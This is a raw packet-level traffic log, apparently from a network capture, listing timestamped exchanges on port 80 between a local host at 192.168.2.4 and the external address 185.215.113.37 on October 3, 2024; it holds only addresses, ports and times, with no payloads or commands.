Oct 3, 2024 18:38:23.769390106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.769401073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.769424915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.769434929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.769459009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.769463062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.769494057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.769510031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.769527912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.769541979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.769562006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.769572020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.769597054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.769607067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.769630909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.769643068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.769665956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.769675016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.769701004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.769711018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.769735098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.769747019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.769768953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.769782066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.769804001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.769813061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.769840002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.769848108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.769874096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.769887924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.769917965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.770266056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.770299911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.770318985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.770334005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.770348072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.770369053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.770406008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.770414114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.770435095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.770467997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.770483971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.770500898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.770510912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.770535946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.770540953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.770570993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.770576000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.770606041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.770617008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.770639896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.770649910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.770674944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.770689011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.770708084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.770718098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.770742893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.770752907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.770787001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.836493969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.836527109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.836561918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.836560965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.836586952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.836613894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.836647034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.836647034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.836671114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.836682081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.836704016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.836718082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.836739063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.836769104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.836770058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.836823940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.836836100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.836858988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.836867094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.836898088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.836909056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.836934090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.836956024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.836966038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.836977005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.836999893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.837019920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.837030888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.837064981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.837069988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.837080956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.837100029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.837119102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.837132931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.837147951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.837181091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.837187052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.837224007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.837235928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.837256908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.837277889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.837315083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.837316036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.837348938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.837363005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.837385893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.837392092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.837435961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.837438107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.837483883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.837486982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.837532043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.837543964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.837578058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.837593079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.837610960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.837625027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.837646008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.837658882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.837692022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.848030090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.848063946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.848093033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.848098993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.848117113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.848134041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.848140955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.848176956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.848185062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.848217010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.848252058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.848259926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.848294020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.848383904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.848417044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.848432064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.848452091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.848459959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.848484993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.848519087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.848531961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.848552942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.848563910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.848587036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.848601103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.848630905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.860647917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.860681057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.860706091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.860716105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.860728025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.860768080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.860807896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.860841036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.860848904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.860873938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.860909939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.860914946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.860965014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.860990047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.861022949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.861056089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.861068964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.861089945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.861100912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.861135006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.861141920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.861176014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.861187935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.861210108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.861227036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.861243963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.861257076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.861278057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.861287117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.861325026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.861486912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.861536980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.861675978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.861711025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.861720085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.861743927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.861754894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.861777067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.861785889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.861813068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.861819029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.861860037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.861864090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.861897945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.861907959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.861933947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.861967087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.861979008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.862010956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.862016916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.862051010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.862057924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.862086058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.862097025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.862126112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.862134933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.862159014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.862169027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.862194061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.862200975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.862227917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.862238884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.862265110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.862276077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.862302065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.862308979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.862409115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.862728119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.862760067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.862791061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.862795115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.862811089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.862828016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.862874985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.862879038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.862915039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.862936020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.862951040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.862956047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.862983942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.862998962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.863018990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.863033056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.863059998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.863069057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.863102913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.863135099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.863142967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.863157034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.863168955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.863182068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.863204002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.863236904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.863248110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.863271952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.863286018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.863306046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.863323927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.863341093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.863356113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.863374949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.863420963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.863950014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.863984108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.864011049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.864017963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.864033937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.864052057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.864058971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.864099026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.864101887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.864152908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.864187002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.864197016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.864223003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.864248991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.864269018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.864274979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.864309072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.864312887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.864342928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.864362955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.864376068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.864394903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.864408970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.864424944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.864447117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.864449978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.864500999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.927939892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.928041935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.928091049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.928124905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.928168058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.928255081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.928287983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.928303003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.928333998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.928361893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.928395033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.928433895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.928443909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.928477049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.928493977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.928512096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.928525925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.928546906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.928579092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.928592920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.928611994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.928622007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.928657055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.928803921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.928836107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.928844929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.928869963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.928904057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.928914070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.928950071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.928956032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.928989887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.928999901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.929023981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.929033995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.929059029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.929090977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.929102898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.929120064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.929132938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.929167032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.929323912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.929357052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.929369926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.929400921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.929430008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.929465055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.929476023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.929498911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.929543972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.932079077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.932132006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.939097881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.939147949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.939162016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.939197063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.939207077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.939239979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.939246893 CEST	80	49730	185.215.113.37	192.168.2.4
